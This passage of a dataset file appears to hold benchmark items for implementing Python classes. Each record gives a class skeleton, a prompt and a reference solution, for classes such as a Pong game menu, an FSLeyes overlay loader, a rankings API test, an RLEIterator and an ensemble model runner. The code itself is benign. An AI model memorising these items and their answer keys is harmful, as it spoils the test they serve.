-self.court.height / 2)\n self.penup()\n\n def play(self):\n \"\"\"Create play button\"\"\"\n self.font_size = int(self.court.score_height / 4)\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n\n def pause(self):\n \"\"\"Create pause button\"\"\"\n self.goto(-5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n self.goto(5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n\n def click(self, x, y):\n \"\"\"Assign menu function on mouse click\"\"\"\n print(x, y)\n if -self.court.width / 2 <= x <= -self.court.width / 2 + self.court.width / 2 / 10 and 
self.court.height / 2 - self.court.score_height / 2 <= y <= self.court.height / 2:\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.color('green')\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n self.game.reset()\n self.game.pause_state = False\n self.game.playing()\n self.game.ball.moving = True\n if self.game.humans == 1:\n self.game.p2.cpu()\n elif self.game.humans == 0:\n self.game.p1.cpu()\n self.game.p2.cpu()\n self.undo()\n if -5 <= x <= 5 and self.court.height / 2 - self.court.score_height <= y <= self.court.height / 2:\n self.game.pause()\n", "source": "the_stack_v2_python_sparse", "source_path": "07. Turtles/PongGame.py", "source_repo": "pBogey/hello-world", "split": "test", "star_events_count": 0} {"blob_id": "28fdbff0af061fcdc4b58a724418db2d027abc6a", "bodies": ["base.Action.__init__(self, self.__loadOverlay)\nself.__overlayList = overlayList\nself.__displayCtx = displayCtx", "def onLoad(paths, overlays):\n if len(overlays) == 0:\n return\n self.__overlayList.extend(overlays)\n self.__displayCtx.selectedOverlay = self.__displayCtx.overlayOrder[-1]\n if self.__displayCtx.autoDisplay:\n for overlay in overlays:\n autodisplay.autoDisplay(overlay, self.__overlayList, self.__displayCtx)\ninteractiveLoadOverlays(onLoad=onLoad, inmem=self.__displayCtx.loadInMemory)"], "bodies_text": "<|body_start_0|>\n base.Action.__init__(self, self.__loadOverlay)\n self.__overlayList = overlayList\n self.__displayCtx = displayCtx\n<|end_body_0|>\n\n<|body_start_1|>\n def onLoad(paths, overlays):\n if len(overlays) == 0:\n return\n self.__overlayList.extend(overlays)\n self.__displayCtx.selectedOverlay = self.__displayCtx.overlayOrder[-1]\n if self.__displayCtx.autoDisplay:\n for overlay in overlays:\n autodisplay.autoDisplay(overlay, self.__overlayList, self.__displayCtx)\n interactiveLoadOverlays(onLoad=onLoad, inmem=self.__displayCtx.loadInMemory)\n<|end_body_1|>\n", "class_docstring": "The ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.", "class_name": "LoadOverlayAction", "detected_licenses": ["BSD-3-Clause", "CC-BY-3.0", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LoadOverlayAction:\n \"\"\"The ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.\"\"\"\n\n def __init__(self, overlayList, displayCtx, frame):\n \"\"\"Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.\"\"\"\n <|body_0|>\n\n def __loadOverlay(self):\n \"\"\"Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. 
If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n base.Action.__init__(self, self.__loadOverlay)\n self.__overlayList = overlayList\n self.__displayCtx = displayCtx\n<|end_body_0|>\n\n<|body_start_1|>\n def onLoad(paths, overlays):\n if len(overlays) == 0:\n return\n self.__overlayList.extend(overlays)\n self.__displayCtx.selectedOverlay = self.__displayCtx.overlayOrder[-1]\n if self.__displayCtx.autoDisplay:\n for overlay in overlays:\n autodisplay.autoDisplay(overlay, self.__overlayList, self.__displayCtx)\n interactiveLoadOverlays(onLoad=onLoad, inmem=self.__displayCtx.loadInMemory)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000477", "length_bytes": 16912, "license_type": "permissive", "methods": [{"docstring": "Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.", "name": "__init__", "signature": "def __init__(self, overlayList, displayCtx, frame)"}, {"docstring": "Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.", "name": "__loadOverlay", "signature": "def __loadOverlay(self)"}], "n_methods": 2, "prompt": "Implement the Python class `LoadOverlayAction` described below.\n\nClass description:\nThe ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.\n\nMethod signatures and docstrings:\n- def __init__(self, overlayList, displayCtx, frame): Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.\n- def __loadOverlay(self): Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.", "prompted_full_text": "Implement the Python class `LoadOverlayAction` described below.\n\nClass description:\nThe ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.\n\nMethod signatures and docstrings:\n- def __init__(self, overlayList, displayCtx, frame): Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.\n- def __loadOverlay(self): Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.\n\n<|skeleton|>\nclass LoadOverlayAction:\n \"\"\"The ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.\"\"\"\n\n def __init__(self, overlayList, displayCtx, frame):\n \"\"\"Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.\"\"\"\n <|body_0|>\n\n def __loadOverlay(self):\n \"\"\"Calls :func:`interactiveLoadOverlays`. 
If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n base.Action.__init__(self, self.__loadOverlay)\n self.__overlayList = overlayList\n self.__displayCtx = displayCtx\n<|end_body_0|>\n\n<|body_start_1|>\n def onLoad(paths, overlays):\n if len(overlays) == 0:\n return\n self.__overlayList.extend(overlays)\n self.__displayCtx.selectedOverlay = self.__displayCtx.overlayOrder[-1]\n if self.__displayCtx.autoDisplay:\n for overlay in overlays:\n autodisplay.autoDisplay(overlay, self.__overlayList, self.__displayCtx)\n interactiveLoadOverlays(onLoad=onLoad, inmem=self.__displayCtx.loadInMemory)\n<|end_body_1|>\n", "revision_id": "46ccb4fe2b2346eb57576247f49714032b61307a", "skeleton": "<|skeleton|>\nclass LoadOverlayAction:\n \"\"\"The ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.\"\"\"\n\n def __init__(self, overlayList, displayCtx, frame):\n \"\"\"Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.\"\"\"\n <|body_0|>\n\n def __loadOverlay(self):\n \"\"\"Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LoadOverlayAction:\n \"\"\"The ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.\"\"\"\n\n def __init__(self, overlayList, displayCtx, frame):\n \"\"\"Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.\"\"\"\n base.Action.__init__(self, self.__loadOverlay)\n self.__overlayList = overlayList\n self.__displayCtx = displayCtx\n\n def __loadOverlay(self):\n \"\"\"Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. 
If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.\"\"\"\n def onLoad(paths, overlays):\n if len(overlays) == 0:\n return\n self.__overlayList.extend(overlays)\n self.__displayCtx.selectedOverlay = self.__displayCtx.overlayOrder[-1]\n if self.__displayCtx.autoDisplay:\n for overlay in overlays:\n autodisplay.autoDisplay(overlay, self.__overlayList, self.__displayCtx)\n interactiveLoadOverlays(onLoad=onLoad, inmem=self.__displayCtx.loadInMemory)\n", "source": "the_stack_v2_python_sparse", "source_path": "fsleyes/actions/loadoverlay.py", "source_repo": "sanjayankur31/fsleyes", "split": "test", "star_events_count": 1} {"blob_id": "5d1fe599a6391946e8f3101eeb4c563d60cd4106", "bodies": ["response = self.client.get('/api/rankings/55')\nself.assertEqual(response.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for too large numbers!{BColors.ENDC}')\nprint(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for too many players.{BColors.ENDC}')\nresponse2 = self.client.get('/api/rankings/-1')\nself.assertEqual(response2.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for negative numers!{BColors.ENDC}')\nprint(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for negative number of players.{BColors.ENDC}')", "response = self.client.get('/api/rankings/2')\nself.assertEqual(response.status_code, 200, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 200!{BColors.ENDC}')\nprint(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct response code for requesting top n players.{BColors.ENDC}')\ntop_n_players = response.data['top_ranking_players']\nn = response.data['n']\nself.assertEqual(n, 2, msg=f'{BColors.FAIL}\\t[-]\\tWrong number of players returned!{BColors.ENDC}')\nprint(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct number of players{BColors.ENDC}')\nfirst_player = top_n_players[0]['points']['llistStandardPoints']['llistSurvivalPoints']\nsecond_player = top_n_players[1]['points']['llistStandardPoints']['llistSurvivalPoints']\nself.assertEquals(first_player >= second_player, True, msg=f'{BColors.FAIL}\\t[-]\\tWrong ordering!{BColors.ENDC}')\nprint(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct ordering of players{BColors.ENDC}')"], "bodies_text": "<|body_start_0|>\n response = self.client.get('/api/rankings/55')\n self.assertEqual(response.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for too large numbers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for too many players.{BColors.ENDC}')\n response2 = self.client.get('/api/rankings/-1')\n self.assertEqual(response2.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for negative numers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for negative number of players.{BColors.ENDC}')\n<|end_body_0|>\n\n<|body_start_1|>\n response = self.client.get('/api/rankings/2')\n self.assertEqual(response.status_code, 200, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 200!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct response code for requesting top n players.{BColors.ENDC}')\n top_n_players = response.data['top_ranking_players']\n n = response.data['n']\n self.assertEqual(n, 2, msg=f'{BColors.FAIL}\\t[-]\\tWrong number of players returned!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct number of 
players{BColors.ENDC}')\n first_player = top_n_players[0]['points']['llistStandardPoints']['llistSurvivalPoints']\n second_player = top_n_players[1]['points']['llistStandardPoints']['llistSurvivalPoints']\n self.assertEquals(first_player >= second_player, True, msg=f'{BColors.FAIL}\\t[-]\\tWrong ordering!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct ordering of players{BColors.ENDC}')\n<|end_body_1|>\n", "class_docstring": "Tests the API call for getting top n ranking players", "class_name": "Rankings", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Rankings:\n \"\"\"Tests the API call for getting top n ranking players\"\"\"\n\n def test_invalid_api_request(self):\n \"\"\"Invalid API request. Too many or too few players requested\"\"\"\n <|body_0|>\n\n def test_top_n(self):\n \"\"\"Test getting top n players\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n response = self.client.get('/api/rankings/55')\n self.assertEqual(response.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for too large numbers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for too many players.{BColors.ENDC}')\n response2 = self.client.get('/api/rankings/-1')\n self.assertEqual(response2.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for negative numers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for negative number of players.{BColors.ENDC}')\n<|end_body_0|>\n\n<|body_start_1|>\n response = self.client.get('/api/rankings/2')\n self.assertEqual(response.status_code, 200, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 200!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct response code for requesting top n players.{BColors.ENDC}')\n top_n_players = response.data['top_ranking_players']\n n = response.data['n']\n self.assertEqual(n, 2, msg=f'{BColors.FAIL}\\t[-]\\tWrong number of players returned!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct number of players{BColors.ENDC}')\n first_player = top_n_players[0]['points']['llistStandardPoints']['llistSurvivalPoints']\n second_player = top_n_players[1]['points']['llistStandardPoints']['llistSurvivalPoints']\n self.assertEquals(first_player >= second_player, True, msg=f'{BColors.FAIL}\\t[-]\\tWrong ordering!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct ordering of players{BColors.ENDC}')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000478", "length_bytes": 2885, "license_type": "permissive", "methods": [{"docstring": "Invalid API request. Too many or too few players requested", "name": "test_invalid_api_request", "signature": "def test_invalid_api_request(self)"}, {"docstring": "Test getting top n players", "name": "test_top_n", "signature": "def test_top_n(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003871", "prompt": "Implement the Python class `Rankings` described below.\n\nClass description:\nTests the API call for getting top n ranking players\n\nMethod signatures and docstrings:\n- def test_invalid_api_request(self): Invalid API request. 
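The `Rankings` bodies above compare scores with `self.assertEquals(first_player >= second_player, True, ...)`; `assertEquals` is a long-deprecated alias in `unittest`, and wrapping a comparison in `assertEqual(..., True)` hides the operands from the failure message. A standalone sketch of the more direct idiom — the scores here are made-up stand-ins, and this is an alternative, not the archived test:

```python
import unittest

class OrderingExample(unittest.TestCase):
    def test_descending_order(self):
        first_player, second_player = 42, 17  # fabricated survival points
        # assertGreaterEqual reports both operands on failure, unlike
        # the deprecated assertEquals(first >= second, True) pattern.
        self.assertGreaterEqual(first_player, second_player,
                                msg='Wrong ordering!')

if __name__ == '__main__':
    unittest.main()
```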
Too many or too few players requested\n- def test_top_n(self): Test getting top n players", "prompted_full_text": "Implement the Python class `Rankings` described below.\n\nClass description:\nTests the API call for getting top n ranking players\n\nMethod signatures and docstrings:\n- def test_invalid_api_request(self): Invalid API request. Too many or too few players requested\n- def test_top_n(self): Test getting top n players\n\n<|skeleton|>\nclass Rankings:\n \"\"\"Tests the API call for getting top n ranking players\"\"\"\n\n def test_invalid_api_request(self):\n \"\"\"Invalid API request. Too many or too few players requested\"\"\"\n <|body_0|>\n\n def test_top_n(self):\n \"\"\"Test getting top n players\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n response = self.client.get('/api/rankings/55')\n self.assertEqual(response.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for too large numbers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for too many players.{BColors.ENDC}')\n response2 = self.client.get('/api/rankings/-1')\n self.assertEqual(response2.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for negative numers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for negative number of players.{BColors.ENDC}')\n<|end_body_0|>\n\n<|body_start_1|>\n response = self.client.get('/api/rankings/2')\n self.assertEqual(response.status_code, 200, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 200!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct response code for requesting top n players.{BColors.ENDC}')\n top_n_players = response.data['top_ranking_players']\n n = response.data['n']\n self.assertEqual(n, 2, msg=f'{BColors.FAIL}\\t[-]\\tWrong number of players returned!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct number of players{BColors.ENDC}')\n first_player = top_n_players[0]['points']['llistStandardPoints']['llistSurvivalPoints']\n second_player = top_n_players[1]['points']['llistStandardPoints']['llistSurvivalPoints']\n self.assertEquals(first_player >= second_player, True, msg=f'{BColors.FAIL}\\t[-]\\tWrong ordering!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct ordering of players{BColors.ENDC}')\n<|end_body_1|>\n", "revision_id": "a47c849ea97763eff1005273a58aa3d8ab663ff2", "skeleton": "<|skeleton|>\nclass Rankings:\n \"\"\"Tests the API call for getting top n ranking players\"\"\"\n\n def test_invalid_api_request(self):\n \"\"\"Invalid API request. Too many or too few players requested\"\"\"\n <|body_0|>\n\n def test_top_n(self):\n \"\"\"Test getting top n players\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Rankings:\n \"\"\"Tests the API call for getting top n ranking players\"\"\"\n\n def test_invalid_api_request(self):\n \"\"\"Invalid API request. 
Too many or too few players requested\"\"\"\n response = self.client.get('/api/rankings/55')\n self.assertEqual(response.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for too large numbers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for too many players.{BColors.ENDC}')\n response2 = self.client.get('/api/rankings/-1')\n self.assertEqual(response2.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for negative numers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for negative number of players.{BColors.ENDC}')\n\n def test_top_n(self):\n \"\"\"Test getting top n players\"\"\"\n response = self.client.get('/api/rankings/2')\n self.assertEqual(response.status_code, 200, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 200!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct response code for requesting top n players.{BColors.ENDC}')\n top_n_players = response.data['top_ranking_players']\n n = response.data['n']\n self.assertEqual(n, 2, msg=f'{BColors.FAIL}\\t[-]\\tWrong number of players returned!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct number of players{BColors.ENDC}')\n first_player = top_n_players[0]['points']['llistStandardPoints']['llistSurvivalPoints']\n second_player = top_n_players[1]['points']['llistStandardPoints']['llistSurvivalPoints']\n self.assertEquals(first_player >= second_player, True, msg=f'{BColors.FAIL}\\t[-]\\tWrong ordering!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct ordering of players{BColors.ENDC}')\n", "source": "the_stack_v2_python_sparse", "source_path": "home_page/api/tests_api.py", "source_repo": "Plongesam/data-structures-game", "split": "test", "star_events_count": 2} {"blob_id": "1da377aae169f5683096ad4e2dc84812f71cfb3b", "bodies": ["self.d = []\nfor i in range(1, len(A), 2):\n for j in range(A[i - 1]):\n self.d.append(A[i])", "if len(self.d) >= n:\n ret = self.d[n - 1]\n self.d = self.d[n:]\nelse:\n ret = -1\n self.d = []\nreturn ret"], "bodies_text": "<|body_start_0|>\n self.d = []\n for i in range(1, len(A), 2):\n for j in range(A[i - 1]):\n self.d.append(A[i])\n<|end_body_0|>\n\n<|body_start_1|>\n if len(self.d) >= n:\n ret = self.d[n - 1]\n self.d = self.d[n:]\n else:\n ret = -1\n self.d = []\n return ret\n<|end_body_1|>\n", "class_docstring": "", "class_name": "RLEIterator", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RLEIterator:\n\n def __init__(self, A):\n \"\"\":type A: List[int]\"\"\"\n <|body_0|>\n\n def next(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.d = []\n for i in range(1, len(A), 2):\n for j in range(A[i - 1]):\n self.d.append(A[i])\n<|end_body_0|>\n\n<|body_start_1|>\n if len(self.d) >= n:\n ret = self.d[n - 1]\n self.d = self.d[n:]\n else:\n ret = -1\n self.d = []\n return ret\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000479", "length_bytes": 628, "license_type": "no_license", "methods": [{"docstring": ":type A: List[int]", "name": "__init__", "signature": "def __init__(self, A)"}, {"docstring": ":type n: int :rtype: int", "name": "next", "signature": "def next(self, n)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002419", "prompt": "Implement the Python class `RLEIterator` described below.\n\nClass description:\nImplement the RLEIterator 
class.\n\nMethod signatures and docstrings:\n- def __init__(self, A): :type A: List[int]\n- def next(self, n): :type n: int :rtype: int", "prompted_full_text": "Implement the Python class `RLEIterator` described below.\n\nClass description:\nImplement the RLEIterator class.\n\nMethod signatures and docstrings:\n- def __init__(self, A): :type A: List[int]\n- def next(self, n): :type n: int :rtype: int\n\n<|skeleton|>\nclass RLEIterator:\n\n def __init__(self, A):\n \"\"\":type A: List[int]\"\"\"\n <|body_0|>\n\n def next(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.d = []\n for i in range(1, len(A), 2):\n for j in range(A[i - 1]):\n self.d.append(A[i])\n<|end_body_0|>\n\n<|body_start_1|>\n if len(self.d) >= n:\n ret = self.d[n - 1]\n self.d = self.d[n:]\n else:\n ret = -1\n self.d = []\n return ret\n<|end_body_1|>\n", "revision_id": "33e5d12bfd9ed9a49cf55df8bd7c6dd8178ec36d", "skeleton": "<|skeleton|>\nclass RLEIterator:\n\n def __init__(self, A):\n \"\"\":type A: List[int]\"\"\"\n <|body_0|>\n\n def next(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RLEIterator:\n def __init__(self, A):\n \"\"\":type A: List[int]\"\"\"\n self.d = []\n for i in range(1, len(A), 2):\n for j in range(A[i - 1]):\n self.d.append(A[i])\n\n def next(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n if len(self.d) >= n:\n ret = self.d[n - 1]\n self.d = self.d[n:]\n else:\n ret = -1\n self.d = []\n return ret\n", "source": "the_stack_v2_python_sparse", "source_path": "iter.py", "source_repo": "kirihar2/coding-competition", "split": "test", "star_events_count": 0} {"blob_id": "56d0fbb0193432d8084ea39ca535d9394ce8a0e8", "bodies": ["self.use_trigger_channel_model = use_trigger_channel_model\nself.use_action_channel_model = use_action_channel_model\nself.use_trigger_fn_model = use_trigger_fn_model\nself.use_action_fn_model = use_action_fn_model", "args, model_classes = ([], [])\nif self.use_trigger_channel_model:\n args.append(self.t_channel_args)\n model_classes.append(TriggerChannelModel)\nif self.use_action_channel_model:\n args.append(self.a_channel_args)\n model_classes.append(ActionChannelModel)\nif self.use_trigger_fn_model:\n args.append(self.t_fn_args)\n model_classes.append(TriggerFunctionModel)\nif self.use_action_fn_model:\n args.append(self.a_fn_args)\n model_classes.append(ActionFunctionModel)\nensembles = []\nfor arg, model_class in zip(args, model_classes):\n ensembles.append(self.create_ensemble(arg, model_class))\nn = len(ensembles[0].test_data()[0])\nmistakes = np.array([False] * n)\nfor ensemble in ensembles:\n inputs, labels, seq_lens = ensemble.test_data()\n m = ensemble.prediction_mistakes(inputs, labels, seq_lens)\n logging.info('Individual error = %s', np.mean(m))\n mistakes = mistakes | m\nerror = np.mean(mistakes)\nlogging.info('Combined Error = %s', error)", "assert len(args.experiment_name) == len(args.saved_model_path)\nconfig = configs.PaperConfiguration\nCombinedModel._log_configurations(config)\nnum_models = len(args.experiment_name)\nmodels = []\nfor i in xrange(num_models):\n with tf.Graph().as_default() as graph:\n logging.info('Model number %s', i)\n expt_path = RNN_EXPT_DIRECTORY + args.experiment_name[i] + '/'\n model = model_class(config, expt_path, stem=True)\n model.load_labels_and_vocab()\n 
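The stored `RLEIterator` solution above flattens every run into a list, so memory grows with the sum of all run lengths; the iterator can instead keep only an index into `A` and an offset into the current run. A constant-extra-memory sketch with the same interface (this is an alternative implementation, not the archived one):

```python
class RLEIterator:
    def __init__(self, A):
        self.A = A       # [count0, value0, count1, value1, ...]
        self.i = 0       # index of the current run's count
        self.used = 0    # elements already consumed from run self.i

    def next(self, n):
        while self.i < len(self.A):
            remaining = self.A[self.i] - self.used
            if n > remaining:      # exhaust this run, move to the next
                n -= remaining
                self.used = 0
                self.i += 2
            else:                  # the n-th element lies in this run
                self.used += n
                return self.A[self.i + 1]
        return -1                  # sequence exhausted

# RLEIterator([3, 8, 0, 9, 2, 5]).next(2) -> 8
```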
model.load_test_dataset(external_csv_file=args.external_test_csv, use_full_test_set=args.use_full_test_set, use_english=args.use_english, use_english_intelligible=args.use_english_intelligible, use_gold=args.use_gold, use_names_descriptions=args.use_names_descriptions)\n model.initialize_network(init_variables=False, graph=graph)\n model.restore(args.saved_model_path[i])\n models.append(model)\nensemble = EnsembledModel()\nfor model in models:\n ensemble.add_model(model)\nreturn ensemble", "logging.basicConfig(level=getattr(logging, args.log_level.upper()), format='%(levelname)s: %(asctime)s: %(message)s')\nlogging.info('Log Level: %s', args.log_level)\nlogging.info('Experiment Name: %s', args.experiment_name)\nlogging.info('Model: %s', args.model[0])\nlogging.info('Saved Model Path: %s', args.saved_model_path)\nlogging.info('Use Full Test Set: %s', args.use_full_test_set)\nlogging.info('Use English Subset: %s', args.use_english)\nlogging.info('Use English and Intelligible Subset: %s', args.use_english_intelligible)\nlogging.info('Use Gold Subset: %s', args.use_gold)\nlogging.info('Use Names and Descriptions: %s', args.use_names_descriptions)", "logging.info('Using the following configurations:')\nlogging.info('hidden_size (d) = %s', config.hidden_size)\nlogging.info('vocab_size (N) = %s', config.vocab_size)\nlogging.info('sent_size (j) = %s', config.sent_size)"], "bodies_text": "<|body_start_0|>\n self.use_trigger_channel_model = use_trigger_channel_model\n self.use_action_channel_model = use_action_channel_model\n self.use_trigger_fn_model = use_trigger_fn_model\n self.use_action_fn_model = use_action_fn_model\n<|end_body_0|>\n\n<|body_start_1|>\n args, model_classes = ([], [])\n if self.use_trigger_channel_model:\n args.append(self.t_channel_args)\n model_classes.append(TriggerChannelModel)\n if self.use_action_channel_model:\n args.append(self.a_channel_args)\n model_classes.append(ActionChannelModel)\n if self.use_trigger_fn_model:\n args.append(self.t_fn_args)\n model_classes.append(TriggerFunctionModel)\n if self.use_action_fn_model:\n args.append(self.a_fn_args)\n model_classes.append(ActionFunctionModel)\n ensembles = []\n for arg, model_class in zip(args, model_classes):\n ensembles.append(self.create_ensemble(arg, model_class))\n n = len(ensembles[0].test_data()[0])\n mistakes = np.array([False] * n)\n for ensemble in ensembles:\n inputs, labels, seq_lens = ensemble.test_data()\n m = ensemble.prediction_mistakes(inputs, labels, seq_lens)\n logging.info('Individual error = %s', np.mean(m))\n mistakes = mistakes | m\n error = np.mean(mistakes)\n logging.info('Combined Error = %s', error)\n<|end_body_1|>\n\n<|body_start_2|>\n assert len(args.experiment_name) == len(args.saved_model_path)\n config = configs.PaperConfiguration\n CombinedModel._log_configurations(config)\n num_models = len(args.experiment_name)\n models = []\n for i in xrange(num_models):\n with tf.Graph().as_default() as graph:\n logging.info('Model number %s', i)\n expt_path = RNN_EXPT_DIRECTORY + args.experiment_name[i] + '/'\n model = model_class(config, expt_path, stem=True)\n model.load_labels_and_vocab()\n model.load_test_dataset(external_csv_file=args.external_test_csv, use_full_test_set=args.use_full_test_set, use_english=args.use_english, use_english_intelligible=args.use_english_intelligible, use_gold=args.use_gold, use_names_descriptions=args.use_names_descriptions)\n model.initialize_network(init_variables=False, graph=graph)\n model.restore(args.saved_model_path[i])\n models.append(model)\n ensemble = 
